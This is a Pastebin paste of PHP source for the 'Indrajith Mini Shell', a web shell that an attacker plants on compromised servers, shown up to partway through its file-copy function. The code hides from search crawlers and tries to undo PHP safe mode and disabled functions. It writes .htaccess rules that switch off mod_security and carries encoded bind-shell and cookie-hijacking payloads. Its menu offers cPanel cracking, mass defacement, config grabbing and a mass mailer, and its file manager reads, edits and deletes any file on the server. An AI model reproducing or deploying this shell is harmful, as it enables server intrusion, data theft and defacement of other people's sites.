nil_007

Indrajith's Shell

Dec 25th, 2016
269
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 91.17 KB | None | 0 0
  1. <?php
  2.  
  3. /*
  4.  * Indrajith Mini Shell v.2.0 with additional features....
  5.  * originally scripted by AJITH KP
  6.  * (c) Under Gnu General Public Licence 3(c)
  7.  * Team Open Fire and Indishell Family
  8.  * TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John.
  9.  * Indishell : ASHELL, D@rkwolf.
  10.  * THA : THA RUDE [There is Nothing in Borders]
  11.  * Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Komputer Korner Friends.
  12.  */
  13.  
  14. /*------------------ LOGIN -------------------*/
  15.  
  16. $username="ajithkp560";
  17. $password="ajithkp560";
  18.  
  19.  
  20. /*------------------ Login Data End ----------*/
  21.  
  22. @error_reporting(4);
  23.  
  24. /*------------------ Anti Crawler ------------*/
  25. if(!empty($_SERVER['HTTP_USER_AGENT']))
  26. {
  27.     $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  28.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
  29.     {
  30.         header('HTTP/1.0 404 Not Found');
  31.         exit;
  32.     }
  33. }
  34. echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
  35. /*------------------ End of Anti Crawler -----*/
  36.  
  37.  
  38.  
  39.     echo "<link href=data:image/gif;base64,R0lGODlhEAAQAPcAADGcADmcADmcCEKcEEKlEEqlGEqlIVKlIVKtIVKtKVqtMWO1OWu1Qmu1SnO1SnO9SnO9Unu9WoS9Y4TGY4zGa4zGc5TGc5TOc5TOe5zOe5zOhK3WlLXepb3ercbntcbnvc7nvc7nxtbvzt7vzt7v1uf33u/35+/37/f37/f/9///9////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////ywAAAAAEAAQAAAIxwA7ABhIsGBBgQEAJAwwgIGEBQojEhQwcIEFDRUUUCS4UCEEjAc2RhQJoIGGCAIERODQQOLAAAc0SABwgEMIDgoSShQgAcMAAx08OBCgEYDImA0CbPiwoICHFBIoDogAwAGGAgpCVBggYgUHAwU2nFgBQEIFARVAGNCwAkNVEytCzKwwc0MHASVICHCQ4gTKgRJaVtAgQAQGBSdMJCDZ0WiADyoYAOCg4eVAkQpWCBRgIoTOjTotrHAwECwAgZYpdkBRQGKHgAAAOw== rel=icon type=image/x-icon />";
  40.     echo "<style>
  41.    html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; }
  42.    #loginbox { font-size:11px; color:green; width:1200px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
  43.    input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; }
  44.    loginbox td { border-radius:5px; font-size:11px; }
  45.    .header { size:25px; color:green; }
  46.    h1 { font-family:DigifaceWide; color:green; font-size:200%; }
  47.    h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; }
  48.    .go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;}
  49.    .input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; }
  50.    hr { border:1px solid #222222; }
  51.    #meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; }
  52.    #meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; }
  53.    #meunlist li { margin: 0px; padding: 0px; display: inline; }
  54.    #meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; }
  55.    #meunlist a:hover { background: #333; color:green; }
  56.    .menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0;  }
  57.    .menu { font-size:25px; color: }
  58.    .textarea_edit { background-color:#111111; border:1px groove #333; color:green; }
  59.    .textarea_edit:hover { text-decoration:none; border:1px dashed #333; }
  60.    .input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;}
  61.    #result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;}
  62.    .table{ width:100%; padding:4px 0; color:#888; font-size:15px; }
  63.    .table a{ text-decoration:none; color:green; font-size:15px; }
  64.    .table a:hover{text-decoration:underline;}
  65.    .table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; }
  66.    .table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; }
  67.    .table tr:hover{ background:#181818; }
  68.    .tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center;  }
  69.    .tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; }
  70.    .tbl a:hover{text-decoration:underline;}
  71.    .tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px;  vertical-align:middle; width: 300px; }
  72.    .tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; }
  73.    .tbl td:hover{ background:#181818; }
  74.    #alert {position: relative;}
  75.    #alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;}
  76.    #alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;}
  77.    #alert:target {display: none;}
  78.    .alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
  79.    .alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
  80.    @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}
  81.    </style>";
  82.     if($_COOKIE["user"] != $username && $_COOKIE["pass"] != md5($password))
  83.     {
  84.         if($_POST["usrname"]==$username && $_POST["passwrd"]==$password)
  85.         {
  86.             print'<script>document.cookie="user='.$_POST["usrname"].';";document.cookie="pass='.md5($_POST["passwrd"]).';";</script>';
  87.             if($email!="")
  88.             {
  89.                 mail_alert();
  90.             }
  91.         }
  92.         else
  93.         {
  94.             if($_POST['usrname'])
  95.             {
  96.                 print'<script>alert("Sorry... Wrong UserName/PassWord");</script>';
  97.             }
  98.             echo '<title>INDRAJITH SHELL v.2.0</title><center>
  99.            <div id=loginbox><p><font face="verdana,arial" size=-1>
  100.            <font color=orange>>>>>>>>>>></font><font color=white>>>>>><<<<<</font><font color=green>>>>>>>>>>></font>
  101.            <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
  102.            <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>INDRAJITH SHELL v.2.0</b></font></th></tr>
  103.            <tr><td bgcolor="black" style="padding:5">
  104.            <form method="post">
  105.            <input type="hidden" name="action" value="login">
  106.            <input type="hidden" name="hide" value="">
  107.            <center><table>
  108.            <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" value="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
  109.            <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="passwrd" value="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
  110.            <tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Enter"></font></td></tr></table>
  111.            </div><br /></center>';
  112.             exit;
  113.         }
  114.     }
  115.  
  116. $color_g="green";
  117. $color_b="4C83AF";
  118. $color_bg="#111111";
  119. $color_hr="#222";
  120. $color_wri="green";
  121. $color_rea="yellow";
  122. $color_non="red";
  123. $path=$_GET['path'];
  124.  
  125. @session_start();
  126. @set_time_limit(0);
  127. @ini_restore("safe_mode_include_dir");
  128. @ini_restore("safe_mode_exec_dir");
  129. @ini_restore("disable_functions");
  130. @ini_restore("allow_url_fopen");
  131. @ini_restore("safe_mode");
  132. @ini_restore("open_basedir");
  133. @ignore_user_abort(FALSE);
  134. @ini_set('zlib.output_compression','Off');
  135.  
  136. $sep="/";
  137. if(strtolower(substr(PHP_OS,0,3))=="win")
  138. {
  139.     $os="win";
  140.     $sep="\\";
  141.     $ox="Windows";
  142. }
  143. else
  144. {
  145.     $os="nix";
  146.     $ox="Linux";
  147. }
  148.  
  149.  
  150.  
  151. $self=$_SERVER['PHP_SELF'];
  152. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
  153. $your_ip=$_SERVER['REMOTE_ADDR'];
  154. $srvr_ip=$_SERVER['SERVER_ADDR'];
  155. $admin=$_SERVER['SERVER_ADMIN'];
  156.  
  157. $s_php_ini="safe_mode=OFF
  158. disable_functions=NONE";
  159.  
  160. $ini_php="<?
  161. echo ini_get(\"safe_mode\");
  162. echo ini_get(\"open_basedir\");
  163. include(\$_GET[\"file\"]);
  164. ini_restore(\"safe_mode\");
  165. ini_restore(\"open_basedir\");
  166. echo ini_get(\"safe_mode\");
  167. echo ini_get(\"open_basedir\");
  168. include(\$_GET[\"ss\"]);
  169. ?>";
  170.  
  171. $s_htaccess="<IfModule mod_security.c>
  172. Sec------Engine Off
  173. Sec------ScanPOST Off
  174. </IfModule>";
  175.  
  176. $s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI
  177. AddType application/x-httpd-cgi .sh
  178. AddHandler cgi-script .pl
  179. AddHandler cgi-script .pl";
  180.  
  181. $sym_htaccess="Options all
  182. DirectoryIndex Sux.html
  183. AddType text/plain .php
  184. AddHandler server-parsed .php
  185. AddType text/plain .html
  186. AddHandler txt .html
  187. Require None
  188. Satisfy Any";
  189.  
  190. $sym_php_ini="safe_mode=OFF
  191. disable_functions=NONE";
  192.  
  193. $forbid_dir="Options -Indexes";
  194.  
  195. $cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";
  196. $bind_perl="rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP";
  197.  
  198. /*----------------------- Top Menu ------------------------------------------*/
  199.  
  200. if($safemode=="On")
  201. {
  202.     echo "<div id='alert'><a class=\"alert_red\" href=\"#alert\">Safe Mode : <font color=green>ON</font></a></div>";
  203. }
  204. else
  205. {
  206.     echo "<div id='alert'><a class=\"alert_green\" href=\"#alert\">Safe Mode : <font color=red>OFF</font></a></div>";
  207. }
  208.  
  209. echo "<script src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>";
  210.  
  211. echo "<title>INDRAJITH SHELL v.2.0</title><div id=result>
  212. <table>
  213.    <tbody>
  214.        <tr>
  215.            <td style='border-right:1px solid #104E8B;' width=\"300px;\">
  216.            <div style='text-align:center;'>
  217.                <a href='?' style='text-decoration:none;'><h1>INDRAJITH</h1></a><font color=blue>MINI SHELL</font>
  218.            </div>
  219.            </td>
  220.            <td>
  221.            <div class=\"header\">OS</font> <font color=\"#666\" >:</font>
  222.            ".$ox." </font> <font color=\"#666\" >|</font> ".php_uname()."<br />
  223.            Your IP : <font color=red>".$your_ip."</font> <font color=\"#666\" >|</font> Server IP : <font color=red>".$srvr_ip."</font> <font color=\"#666\" > | </font> Admin <font color=\"#666\" > : </font> <font color=red> {$admin} </font> <br />
  224.            MySQL <font color=\"#666\" > : </font>"; echo mysqlx();
  225.             echo "<font color=\"#666\" > | </font> Oracle <font color=\"#666\" > : </font>"; echo oraclesx();
  226.             echo "<font color=\"#666\" > | </font> MSSQL <font color=\"#666\" > : </font>"; echo mssqlx();
  227.             echo "<font color=\"#666\" > | </font> PostGreySQL <font color=\"#666\" > : </font>";echo postgreyx();
  228.             echo "<br />cURL <font color=\"#666\" > : </font>";echo curlx();
  229.             echo "<font color=\"#666\" > | </font>Total Space<font color=\"#666\" > : </font>"; echo disc_size();
  230.             echo "<font color=\"#666\" > | </font>Free Space<font color=\"#666\" > : </font>"; echo freesize();
  231.             echo "<br />Software<font color=\"#666\" > : </font><font color=red>{$srvr_sof}</font><font color=\"#666\" > | </font> PHP<font color=\"#666\" > : </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>".phpversion()."</a>
  232.            <br />Disabled Functions<font color=\"#666\" > : </font></font><font color=red>";echo disabled_functns()."</font><br />";
  233.             if($os == 'win'){ echo  "Drives <font color=\"#666\" > : </font>";echo  drivesx(); }
  234.             else { echo "r00t Exploit <font color=\"#666\" > : </font><font color=red>"; echo r00t_exploit() ."</font>"; }
  235.             echo "
  236.            </div>
  237.            </td>
  238.        </tr>
  239.    </tbody>
  240. </table></div>";
  241. echo "<div class='menubar'> <div id=\"meunlist\">
  242. <ul>
  243. <li><a href=\"?\">HOME</a></li>
  244. <li><a href=\"?symlink\">SymLink</a></li>
  245. <li><a href=\"?rs\">((( Connect )))</a></li>
  246. <li><a href=\"?cookiejack\">Cookie HighJack</a></li>
  247. <li><a href=\"?encodefile\">PHP Encode/Decode</a></li>
  248. <li><a href=\"?path={$path}&amp;safe_mod\">Safe Mode Fucker</a></li>
  249. <li><a href=\"?path={$path}&amp;forbd_dir\">Directory Listing Forbidden</a></li>
  250. </ul>
  251. <ul>
  252. <li><a href=\"?massmailer\">Mass Mailer</a></li>
  253. <li><a href=\"?cpanel_crack\">CPANEL Crack</a></li>
  254. <li><a href=\"?server_exploit_details\">Exploit Details</a></li>
  255. <li><a href=\"?remote_server_scan\">Remote Server Scan</a></li>
  256. <li><a href=\"?remotefiledown\">Remote File Downloader</a></li>
  257. <li><a href=\"?hexenc\">Hexa Encode/Decode</a></li>
  258. </ul>
  259. <ul>
  260. <li><a href=\"?sh311_scanner\">SH3LL Scan</a></li>
  261. <li><a href=\"?sshman\">SSH Shell</a></li>
  262. <li><a href=\"?path={$path}&c0de_inject\">c0de inj3ct</a></li>
  263. <li><a href=\"?ftpman\">FTP Manager</a></li>
  264. <li><a href=\"?ftp_anon_scan\">FTP Anonymous Access Scan</a></li>
  265. <li><a href=\"?path={$path}&amp;mass_xploit\">Mass Deface</a></li>
  266. <li><a href=\"?config_grab\">Config Grabber</a></li>
  267. <li><a href=\"?killme\"><font color=red>Kill Me</font></a></li>
  268. </ul>
  269. </div></div>";
  270. /*----------------------- End of Top Menu -----------------------------------*/
  271.  
  272.  
  273. /*--------------- FUNCTIONS ----------------*/
  274. function alert($alert_txt)
  275. {
  276.     echo "<script>alert('".$alert_txt."');window.location.href='?';</script>";
  277. }
  278.  
  279. function disabled_functns()
  280. {
  281.     if(!@ini_get('disable_functions'))
  282.     {
  283.         echo "None";
  284.     }
  285.     else
  286.     {
  287.     echo @ini_get('disable_functions');
  288.     }
  289. }
  290.  
  291.  
  292. function drivesx()
  293. {
  294.     foreach(range('A','Z') as $drive)
  295.     {
  296.         if(is_dir($drive.':\\'))
  297.         {
  298.             echo "<a style='color:green; text-decoration:none;' href='?path=".$drive.":\\'>[".$drive."]</a>";
  299.         }
  300.     }
  301. }
  302.  
  303. function mail_alert()
  304. {
  305.     global $email, $your_ip;
  306.     $shell_path="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  307.     $content_mail="Hello Master,\n
  308. Your shell in $shell_path is accessed by ".$_SERVER['REMOTE_ADDR'] .". Hope You Enjoy this shell very much.\n
  309. By Indrajith";
  310.     mail($email, "Shell Accessed!!!", $content_mail ,"From:[email protected]");
  311. }
  312.  
  313. function filesizex($size)
  314. {
  315.     if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
  316.     elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
  317.     elseif ($size>=1024)$size = round(($size/1024),2)." KB";
  318.     else $size .= " B";
  319.     return $size;
  320. }
  321.  
  322. function disc_size()
  323. {
  324.     echo filesizex(disk_total_space("/"));
  325. }
  326.  
  327. function freesize()
  328. {
  329.     echo filesizex(disk_free_space("/"));
  330. }
  331.  
  332. function file_perm($filz){
  333.     if($m=fileperms($filz)){
  334.         $p='';
  335.         $p .= ($m & 00400) ? 'r' : '-';
  336.         $p .= ($m & 00200) ? 'w' : '-';
  337.         $p .= ($m & 00100) ? 'x' : '-';
  338.         $p .= ($m & 00040) ? 'r' : '-';
  339.         $p .= ($m & 00020) ? 'w' : '-';
  340.         $p .= ($m & 00010) ? 'x' : '-';
  341.         $p .= ($m & 00004) ? 'r' : '-';
  342.         $p .= ($m & 00002) ? 'w' : '-';
  343.         $p .= ($m & 00001) ? 'x' : '-';
  344.         return $p;
  345.     }
  346.     else return "?????";
  347. }
  348.  
  349.  
  350. function mysqlx()
  351. {
  352.     if(function_exists('mysql_connect'))
  353.     {
  354.         echo "<font color='red'>Enabled</font>";
  355.     }
  356.     else
  357.     {
  358.         echo "<font color='green'>Disabled</font>";
  359.     }  
  360. }
  361.  
  362. function oraclesx()
  363. {
  364.     if(function_exists('oci_connect'))
  365.     {
  366.         echo "<font color='red'>Enabled</font>";
  367.     }
  368.     else
  369.     {
  370.         echo "<font color='green'>Disabled</font>";
  371.     }
  372. }
  373.  
  374. function mssqlx()
  375. {
  376.     if(function_exists('mssql_connect'))
  377.     {
  378.         echo "<font color='red'>Enabled</font>";
  379.     }
  380.     else
  381.     {
  382.         echo "<font color='green'>Disabled</font>";
  383.     }  
  384. }
  385.  
  386. function postgreyx()
  387. {
  388.     if(function_exists('pg_connect'))
  389.     {
  390.         echo "<font color='red'>Enabled</font>";
  391.     }
  392.     else
  393.     {
  394.         echo "<font color='green'>Disabled</font>";
  395.     }
  396. }
  397.  
  398. function strip($filx)
  399. {
  400.     if(!get_magic_quotes_gpc()) return trim(urldecode($filx));
  401.     return trim(urldecode(stripslashes($filx)));
  402. }
  403.  
  404. function curlx()
  405. {
  406.     if(function_exists('curl_version'))
  407.     {
  408.         echo "<font color='red'>Enabled</font>";
  409.     }
  410.     else
  411.     {
  412.         echo "<font color='green'>Disabled</font>";
  413.     }
  414. }
  415.  
  416. function filesize_x($filex)
  417. {
  418.     $f_size=filesizex(filesize($filex));
  419.     return $f_size;
  420. }
  421.  
  422. function rename_ui()
  423. {
  424.     $rf_path=$_GET['rename'];
  425.     echo "<div id=result><center><h2>Rename</h2><hr /><p><br /><br /><form method='GET'><input type=hidden name='old_name' size='40' value=".$rf_path.">New Name : <input name='new_name' size='40' value=".basename($rf_path)."><input type='submit' value='   >>>   ' /></form></p><br /><br /><hr /><br /><br /></center></div>";
  426. }
  427.  
  428. function filemanager_bg()
  429. {
  430.     global $sep, $self;
  431.     $path=!empty($_GET['path'])?$_GET['path']:getcwd();
  432.     $dirs=array();
  433.     $fils=array();
  434.     if(is_dir($path))
  435.     {
  436.         chdir($path);
  437.         if($handle=opendir($path))
  438.         {
  439.             while(($item=readdir($handle))!==FALSE)
  440.             {
  441.                 if($item=="."){continue;}
  442.                 if($item==".."){continue;}
  443.                 if(is_dir($item))
  444.                 {
  445.                     array_push($dirs, $path.$sep.$item);
  446.                 }
  447.                 else
  448.                 {
  449.                     array_push($fils, $path.$sep.$item);
  450.                 }
  451.             }
  452.         }
  453.         else
  454.         {
  455.             alert("Access Denied for this operation");
  456.         }
  457.     }
  458.     else
  459.     {
  460.         alert("Directory Not Found!!!");
  461.     }
  462.     echo "<div id=result><table class=table>
  463.    <tr>
  464.    <th width='500px'>Name</th>
  465.    <th width='100px'>Size</th>
  466.    <th width='100px'>Permissions</th>
  467.    <th width='500px'>Actions</th>
  468.    </tr>";
  469.     foreach($dirs as $dir)
  470.     {
  471.         echo "<tr><td><a href='{$self}?path={$dir}'>".basename($dir)."</a></td>
  472.              <td>".filesize_x($dir)."</td>
  473.              <td><a href='{$self}?path={$path}&amp;perm={$dir}'>".file_perm($dir)."</a></td>
  474.              <td><a href='{$self}?path={$path}&amp;del_dir={$dir}'>Delete</a> | <a href='{$self}?path={$path}&amp;rename={$dir}'>Rename</a></td></tr>";
  475.     }
  476.     foreach($fils as $fil)
  477.     {
  478.         echo "<tr><td><a href='{$self}?path={$path}&amp;read={$fil}'>".basename($fil)."</a></td>
  479.              <td>".filesize_x($fil)."</td>
  480.              <td><a href='{$self}?path={$path}&amp;perm={$fil}'>".file_perm($fil)."</a></td>
  481.              <td><a href='{$self}?path={$path}&amp;del_fil={$fil}'>Delete</a> | <a href='{$self}?path={$path}&amp;rename={$fil}'>Rename</a> | <a href='{$self}?path={$path}&amp;edit={$fil}'>Edit</a> | <a href='{$self}?path={$path}&amp;copy={$fil}'>Copy</a>  </td>";
  482.     }
  483.     echo "</tr></table></div>";
  484. }
  485.  
  486. function rename_bg()
  487. {
  488.     if(isset($_GET['old_name']) && isset($_GET['new_name']))
  489.     {
  490.         $o_r_path=basename($_GET['old_name']);
  491.         $r_path=str_replace($o_r_path, "", $_GET['old_name']);
  492.         $r_new_name=$r_path.$_GET['new_name'];
  493.         echo $r_new_name;
  494.         if(rename($_GET['old_name'], $r_new_name)==FALSE)
  495.         {
  496.             alert("Access Denied for this action!!!");
  497.         }
  498.         else
  499.         {
  500.             alert("Renamed File Succeessfully");
  501.         }
  502.     }
  503. }
  504.  
  505. function edit_file()
  506. {
  507.     $path=$_GET['path'];
  508.     chdir($path);
  509.     $edt_file=$_GET['edit'];
  510.     $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
  511.     if($e_content)
  512.     {
  513.         $o_content=$e_content;
  514.     }
  515.     else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  516.     {
  517.         $fd = fopen($edt_file, "rb");
  518.     if(!$fd)
  519.         {
  520.             alert("Permission Denied");
  521.         }
  522.     else
  523.         {
  524.             while(!feof($fd))
  525.             {
  526.                 $o_content=wordwrap(htmlspecialchars(fgets($fd)));
  527.             }
  528.         }
  529.         fclose($fd);
  530.     }
  531.     echo "<div id='result'><center><h2>Edit File</h2><hr /></center><br /><font color=red>View File</font> : <font color=green><a style='text-decoration:none; color:green;' href='?read=".$_GET['edit']."'>".  basename($_GET['edit'])  ."</a><br /><br /><hr /><br /></font><form method='POST'><input type='hidden' name='e_file' value=".$_GET['edit'].">
  532.          <center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>".$o_content."</textarea></center><hr />
  533.          <input class='input_big' name='save' type='submit' value='   Save   ' /><br /><br /><hr /><br /><br /></div>";
  534. }
  535. function edit_file_bg()
  536. {
  537.     if(file_exists($_POST['e_file']))
  538.     {
  539.         $handle = fopen($_POST['e_file'],"w+");
  540.     if (!handle)
  541.         {
  542.             alert("Permission Denied");
  543.         }
  544.     else
  545.         {
  546.             fwrite($handle,$_POST['e_content_n']);
  547.             alert("Your changes were Successfully Saved!");
  548.         }
  549.         fclose($handle);
  550.     }
  551.     else
  552.     {
  553.         alert("File Not Found!!!");
  554.     }
  555. }
  556. function delete_file()
  557. {
  558.     $del_file=$_GET['del_fil'];
  559.     if(unlink($del_file) != FALSE)
  560.     {
  561.         alert("Deleted Successfully");
  562.         exit;
  563.     }
  564.     else
  565.     {
  566.         alert("Access Denied for this Operation");
  567.         exit;
  568.     }
  569. }
  570. function deldirs($d_dir)
  571. {
  572.     $d_files= glob($d_dir.'*', GLOB_MARK);
  573.     foreach($d_files as $d_file)
  574.     {
  575.         if(is_dir($d_file))
  576.         {
  577.             deldirs($d_file);
  578.         }
  579.         else
  580.         {
  581.             unlink($d_file);
  582.         }
  583.     }
  584.     if(is_dir($d_dir))
  585.     {
  586.         if(rmdir($d_dir))
  587.         {
  588.             alert("Deleted Directory Successfully");
  589.         }
  590.         else
  591.         {
  592.             alert("Access Denied for this Operation");
  593.         }
  594.     }
  595. }
  596.  
  597. function code_viewer()
  598. {
  599.     $path=$_GET['path'];
  600.     $r_file=$_GET['read'];
  601.     $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
  602.     if($r_content)
  603.     {
  604.         $rr_content=$r_content;
  605.     }
  606.     else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  607.     {
  608.         $fd = fopen($r_file, "rb");
  609.     if (!$fd)
  610.         {
  611.             alert("Permission Denied");
  612.         }
  613.     else
  614.         {
  615.             while(!feof($fd))
  616.             {
  617.                 $rr_content=wordwrap(htmlspecialchars(fgets($fd)));
  618.             }
  619.         }
  620.         fclose($fd);
  621.     }
  622.     echo "<div id=result><center><h2>View File</h2></center><hr /><br /><font color=red>Edit File</font><font color=green> : </font><font color=#999><a style='text-decoration:none; color:green;' href='?path={$path}&amp;edit=".$_GET['read']."'>".  basename($_GET['read'])  ."</a></font><br /><br /><hr /><pre><code>".$rr_content."</code></pre><br /><br /><hr /><br /><br /></div>";
  623. }
  624. function copy_file_ui()
  625. {
  626.     echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=".$_GET['copy']." > To : <input size=40 name='c_target' value=".$_GET['path'].$sep."> Name : <input name='cn_name'><input type='submit' value='   >>   ' /></form></table><br /><br /><hr /><br /><br /><br /></center></div>";
  627. }
  628. function copy_file_bg()
  629. {
  630.     global $sep;
  631.     if(function_exists(copy))
  632.     {
